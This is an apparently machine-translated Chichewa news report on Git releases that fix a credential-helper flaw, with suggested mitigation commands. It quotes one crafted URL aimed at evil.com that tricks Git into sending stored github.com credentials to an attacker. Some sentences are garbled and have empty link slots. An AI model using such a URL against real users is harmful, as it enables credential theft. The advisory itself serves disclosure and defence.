kutulutsidwa kwadongosolo logawira gwero la Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 ndi 2.17.4, mkati amene anathetsa () m'malo mwake"", zomwe zimapangitsa kuti zidziwitso zitumizidwe kwa wolandila wolakwika pomwe kasitomala wa git alowa m'malo pogwiritsa ntchito ulalo wopangidwa mwapadera wokhala ndi mtundu watsopano. Chiwopsezochi chingagwiritsidwe ntchito kukonza zotsimikizira kuchokera kwa wolandira wina kuti atumizidwe ku seva yoyendetsedwa ndi wowukirayo.
Mukatchula ulalo ngati "https://evil.com?%0ahost=github.com/", chothandizira polumikizana ndi evil.com chidzadutsa zotsimikizira zomwe zafotokozedwa za github.com. Vutoli limachitika pochita zinthu ngati "git clone", kuphatikiza ma URL okonza ma submodule (mwachitsanzo, "git submodule update" imangokonza ma URL omwe afotokozedwa mufayilo ya .gitmodules kuchokera m'nkhokwe). Chiwopsezochi ndi chowopsa kwambiri pakachitika pomwe wopanga amapangira chosungira osawona ulalo, mwachitsanzo, akamagwira ntchito ndi ma submodules, kapena m'makina omwe amangochita zinthu zokha, mwachitsanzo, pomanga phukusi.
Kuletsa zofooka m'mitundu yatsopano kupititsa munthu watsopano muzinthu zilizonse zomwe zimafalitsidwa kudzera mu protocol yosinthana. Kwa magawo, mutha kutsata kutulutsidwa kwa zosintha zamaphukusi patsamba , , , , , , .
Monga njira yothetsera vutoli Osagwiritsa ntchito credential.helper mukalowa m'malo osungira anthu ndipo musagwiritse ntchito "git clone" munjira ya "-recurse-submodules" yokhala ndi nkhokwe zosasankhidwa. Kuletsa kwathunthu credential.helper handler, zomwe zimatero ndikubweza mawu achinsinsi kuchokera , kutetezedwa kapena fayilo yokhala ndi mawu achinsinsi, mutha kugwiritsa ntchito malamulo awa:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Source: opennet.ru